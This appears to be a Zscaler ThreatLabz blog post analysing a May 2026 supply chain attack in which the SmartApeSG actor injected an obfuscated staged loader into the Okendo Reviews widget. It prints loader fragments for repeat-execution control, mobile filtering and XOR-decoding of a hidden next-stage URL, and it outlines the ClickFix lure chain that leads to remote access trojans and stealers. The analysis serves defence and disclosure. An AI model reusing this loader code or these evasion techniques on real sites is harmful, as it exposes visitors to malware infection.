SmartApeSG Launches Okendo Reviews Supply Chain Attack

Introduction

On May 14, 2026, the Zscaler ThreatLabz team identified unusually high activity associated with the threat actor SmartApeSG to deploy malware. During our examination, we discovered malicious JavaScript code embedded in a legitimate reviews widget found on numerous websites. Our analysis revealed that the affected component was the Okendo Reviews widget, a popular customer review platform used by more than 18,000 brands. Because the Okendo Reviews widget is widely deployed, this compromise enabled downstream exposure across any website that utilized the widget. The widget is typically deployed on high-visibility e-commerce pages, including: storefront homepages, product information pages, and review submissions.

In this blog post, ThreatLabz analyzes the behavior of the injected JavaScript, including how it limits repeat execution, filters targets, and uses staged retrieval to pull additional content only after specific conditions are met. We also highlight the use of obfuscation to conceal next-stage infrastructure and enable ClickFix-style social engineering as part of the broader SmartApeSG infection chain. Furthermore, we analyze the inherent dangers of third-party widget compromises, which facilitate the delivery of malicious code across a vast ecosystem of unsuspecting websites.

Note: ThreatLabz reported the incident to Okendo who confirmed it was aware of this security incident and restored the widget script to a clean state.

Key Takeaways

• On May 14, 2026, ThreatLabz identified a supply chain attack involving the Okendo Reviews widget.
• Websites impacted by the attack receive hundreds of thousands to several million monthly visitors.
• The injected JavaScript used obfuscation, environment checks, and staged execution.
• The attack used ClickFix-style social engineering lures in later stages.
• SmartApeSG activity commonly leads to the deployment of remote access trojans (RATs) such as NetSupport and Remcos, or information stealers such as StealC.

Technical Analysis

SmartApeSG (also tracked as ZPHP or HANEYMANEY) has been associated in prior campaigns that led to the deployment of malware families such as NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.

In this incident, the SmartApeSG injected JavaScript behaved as a staged loader, and did not attempt to execute every action immediately. Instead, the JavaScript focused on control, reconstruction, and retrieval which reduced the visibility of the script and gave the operator more flexibility. A portion of the malicious JS is shown in the figure below:

Figure 1: Malicious SmartApeSG JavaScript code injected into the Okendo Reviews script.

At a high level, the SmartApeSG loader workflow includes the stages shown in the figure below:

Figure 2: SmartApeSG loader workflow overview. 

Execution control and target filtering (localStorage)

To suppress repeated execution, the script implements browser-side state tracking using localStorage. On first execution, the code writes a timestamp marker. Subsequent visits can be short-circuited based on that stored value, which reduces noisy repeat behavior and lowers the chance of casual observation during testing.

The script also applies User-Agent filtering. In the samples we analyzed, the checks biased execution toward desktop environments and excluded mobile devices. This is consistent with later-stage ClickFix workflows, which are typically optimized for desktop interaction patterns and follow-on tooling.

The following example shows the script using localStorage to track prior execution and the User-Agent checks for mobile browsers.

 function _0x32dfc8() {
       const _0x26256c = _0xd28549;
       const _0x490d08 = localStorage['getItem'](_0x4a5293);
       if (!_0x490d08) {
           localStorage['setItem'](_0x4a5293, Date['now']()[_0x26256c(0xde)]());
           return ![];
  function _0x4e7869() {
       return /Android|iPhone/i ['test'](navigator['userAgent']);
   }

Deobfuscation and dynamic infrastructure construction

After the environment checks are complete, the loader reconstructs the next-stage delivery path. The infrastructure is not stored in cleartext. Instead, the destination is split into encoded fragments designed to complicate static inspection and evade basic signature approaches.

During execution, the script applies an XOR-based decoding routine to rebuild the hidden path. It also generates a randomized 8-character token and dynamically inserts a new <script> element into the page to retrieve follow-on content.

The following example shows the loader decoding XOR-obfuscated string fragments to reconstruct the hidden next-stage URL.

function __getHiddenURL() {
   const _0x59daee = _0x3b1d;
   const _0x4e7e48 = _0x59daee(0xd9);
   const _0x5c29df = ['1f044640', '044a1d1f', '16005b1e', '0019484a', _0x59daee(0xe4), _0x59daee(0xe6), '141f5f1f', '141c5359', '1a031d43', '141f4255', _0x59daee(0xd4), '121d531e', '0718420f'];
   let _0x5c798a = '';
   for (let _0xb3288f = 0x0; _0xb3288f_0x5c29df['length']; _0xb3288f++) {
       let _0x5d86c7 = _0x5c29df[_0xb3288f];
       let _0x22ea90 = '';
       for (let _0x3ba209 = 0x0; _0x3ba209_0x5d86c7['length']; _0x3ba209 += 0x2) {
           const _0x9daa62 = parseInt(_0x5d86c7['substr'](_0x3ba209, 0x2), 0x10);
           _0x22ea90 += String['fromCharCode'](_0x9daa62 ^ _0x4e7e48[_0x59daee(0xe0)](_0x3ba209 / 0x2 % _0x4e7e48['length']));
       }
       _0x5c798a += _0x22ea90;
   }
   return _0x5c798a;

The structure and execution model we observed align with previously documented SmartApeSG campaigns. 

The SmartApeSG infection chain will typically go on to perform the following actions: 

• Display a fake CAPTCHA or verification prompt.
• Present instructions for the user to run copied commands via the Windows Run menu.
• Retrieve PowerShell or HTML Application (HTA) downloaders.
• Deploy remote access tools or information stealers.

Estimated Reach

Within the observation window, ThreatLabz observed the Okendo Reviews widget embedded in both mid-sized stores and large e-commerce sites. Based on estimated traffic, the affected sites ranged from about 150,000 to several million monthly visits. In one case, a popular U.S. retail brand website, which receives approximately 7 million monthly visits was impacted. These volumes suggest the compromise may have reached a large number of visitors, since the widget runs in the browser and is loaded on high-traffic pages. It is important to note traffic estimates do not equate to confirmed end-user exposure or infection.

The graph below shows a sharp spike in the Zscaler Cloud on May 14, with nearly 15,000 blocks in a single day as shown below:

Figure 3: SmartApeSG blocks (on a log scale) in the Zscaler cloud in May 2026. 

Conclusion

The Okendo Reviews widget is used across many popular websites with significant volumes of traffic. This attack demonstrates the impact that software supply-chain style attacks can have with the compromise of a single vendor. The injected JavaScript can run in a visitor’s browser, load additional stages, and trigger ClickFix-style prompts that push users into running commands. From there, the infection chain can deliver additional malicious payloads and enable follow-on activity on affected systems.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat name:

• JS.Injection.SmartApeSG

Indicators Of Compromise (IOCs)